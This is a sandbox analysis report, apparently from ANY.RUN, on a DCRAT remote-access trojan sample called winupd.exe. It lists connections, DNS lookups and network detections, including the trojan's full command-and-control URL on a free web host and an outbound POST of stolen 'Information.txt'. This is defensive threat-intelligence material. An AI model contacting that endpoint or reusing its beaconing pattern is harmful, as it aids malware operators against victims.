http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&714839bee31f9c5256b219d4a9de7452=d1nI2UzY4YTN5YjZyUWOwQDNxEWNwcjN1czM1IWN0UTN3ATMmhTNiNWMxIiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4300
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.23.227.215:443
Ooredoo Q.S.C.
QA
unknown
4300
svchost.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4300
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
sigmabioaef.atwebpages.com
  • 185.176.43.100
malicious
ipinfo.io
  • 34.117.59.81
whitelisted
self.events.data.microsoft.com
  • 20.189.173.24
whitelisted

Threats

PID
Process
Class
Message
2972
RuntimeBroker.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
2972
RuntimeBroker.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2972
RuntimeBroker.exe
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ipinfo.io
2972
RuntimeBroker.exe
Misc activity
ET HUNTING Suspicious HTTP POST to Free Web Host Atwebpages
2972
RuntimeBroker.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
winupd.exe